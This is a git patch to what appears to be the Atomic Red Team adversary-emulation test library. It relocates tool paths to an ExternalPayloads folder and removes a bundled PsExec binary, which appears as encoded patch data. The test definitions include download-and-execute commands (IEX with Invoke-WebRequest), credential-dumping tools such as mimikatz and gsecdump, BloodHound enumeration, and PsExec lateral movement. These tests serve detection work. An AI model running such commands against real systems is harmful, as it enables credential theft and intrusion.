From 586818a01f95efb592f3ffbf3203d9a14a814d71 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 15 Jun 2023 12:52:16 -0700 Subject: [PATCH] use ExternalPayloads folder (#2462) * use ExternalPayloads folder * psexec as external dependency * psexec as external dependency --- atomics/T1003/T1003.yaml | 2 +- atomics/T1049/T1049.yaml | 2 +- atomics/T1059.001/T1059.001.yaml | 15 +++++---------- atomics/T1105/T1105.yaml | 14 +++++--------- atomics/T1218/T1218.yaml | 6 +++--- atomics/T1220/T1220.yaml | 5 +++-- atomics/T1552.004/T1552.004.yaml | 2 +- atomics/T1552.006/T1552.006.yaml | 2 +- atomics/T1559/T1559.yaml | 30 +++++++++++++++--------------- atomics/T1569.002/T1569.002.yaml | 12 +++++++++++- atomics/T1569.002/bin/PsExec.exe | Bin 440216 -> 0 bytes 11 files changed, 46 insertions(+), 44 deletions(-) delete mode 100644 atomics/T1569.002/bin/PsExec.exe diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index d9121d50..6402656b 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -19,7 +19,7 @@ atomic_tests: gsecdump_exe: description: Path to the Gsecdump executable type: path - default: PathToAtomicsFolder\T1003\bin\gsecdump.exe + default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe gsecdump_bin_hash: description: File hash of the Gsecdump binary file type: string diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index f1b647be..e627d7cf 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -66,7 +66,7 @@ atomic_tests: SharpView: description: Path of the executable opensource redteam tool used for the performing this atomic. type: path - default: PathToAtomicsFolder\T1049\bin\SharpView.exe + default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe syntax: description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. type: string diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 289d982d..90427407 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -25,23 +25,18 @@ atomic_tests: Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. supported_platforms: - windows - input_arguments: - file_path: - description: File path for SharpHound payload - type: string - default: PathToAtomicsFolder\T1059.001\src dependency_executor_name: powershell dependencies: - description: | - SharpHound.ps1 must be located at #{file_path} + SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" prereq_command: | - if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" executor: command: | - write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan - import-module #{file_path}\SharpHound.ps1 + import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5 cleanup_command: | diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 8021e38b..46f9de59 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -593,6 +593,7 @@ atomic_tests: prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." executor: @@ -774,13 +775,9 @@ atomic_tests: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt - local_nimgrab: - description: Local path to nimgrab - type: path - default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe executor: command: | - cmd /c nimgrab.exe #{remote_file} #{destination_path} + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path} cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt @@ -789,13 +786,12 @@ atomic_tests: - description: | NimGrab must be installed on system. prereq_command: | - if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force - Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim - Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index e52ca500..29378d13 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -154,7 +154,7 @@ atomic_tests: renamed_binary: description: renamed Microsoft.Workflow.Compiler type: path - default: PathToAtomicsFolder\T1218\src\svchost.exe + default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe type: path @@ -168,10 +168,10 @@ atomic_tests: - description: | .Net must be installed for this test to work correctly. prereq_command: | - Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} get_prereq_command: | - write-host "you need to rename workflow complier before you run this test" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force executor: command: | #{renamed_binary} #{xml_payload} output.txt diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 18e8357c..24508374 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -22,7 +22,7 @@ atomic_tests: msxsl_exe: description: Location of the MSXSL executable. type: path - default: PathToAtomicsFolder\T1220\bin\msxsl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | @@ -44,6 +44,7 @@ atomic_tests: prereq_command: | if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | @@ -72,7 +73,7 @@ atomic_tests: msxsl_exe: description: Location of the MSXSL executable. type: path - default: PathToAtomicsFolder\T1220\bin\msxsl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index b98ced22..0288f014 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -290,7 +290,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: string - default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1552.006/T1552.006.yaml b/atomics/T1552.006/T1552.006.yaml index 372d33d4..f5908e7f 100644 --- a/atomics/T1552.006/T1552.006.yaml +++ b/atomics/T1552.006/T1552.006.yaml @@ -38,7 +38,7 @@ atomic_tests: gpp_script_path: description: Path to the Get-GPPPassword PowerShell Script type: path - default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1 + default: PathToAtomicsFolder\..\ExternalPayloads\Get-GPPPassword.ps1 dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1559/T1559.yaml b/atomics/T1559/T1559.yaml index a27c1b54..86962eaa 100644 --- a/atomics/T1559/T1559.yaml +++ b/atomics/T1559/T1559.yaml @@ -15,15 +15,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 1 name: command_prompt - name: Cobalt Strike Lateral Movement (psexec_psh) pipe @@ -39,15 +39,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 2 name: command_prompt - name: Cobalt Strike SSH (postex_ssh) pipe @@ -63,15 +63,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 3 name: command_prompt - name: Cobalt Strike post-exploitation pipe (4.2 and later) @@ -87,15 +87,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 4 name: command_prompt - name: Cobalt Strike post-exploitation pipe (before 4.2) @@ -111,13 +111,13 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 5 name: command_prompt diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index 170e79d6..c06ea1a7 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -119,13 +119,23 @@ atomic_tests: description: Target hostname to attempt psexec connection to for emulation of lateral movement. type: string default: $ENV:COMPUTERNAME + dependencies: + - description: | + PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" + prereq_command: | + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: command: | cmd.exe /c "wmic csproduct get UUID" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1" reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f - copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp + copy "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" $env:temp cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token"" cleanup_command: | reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f diff --git a/atomics/T1569.002/bin/PsExec.exe b/atomics/T1569.002/bin/PsExec.exe deleted file mode 100644 index 610baee02431e766c6bcd5ac2d6b6aa243ace1a1..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 440216 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 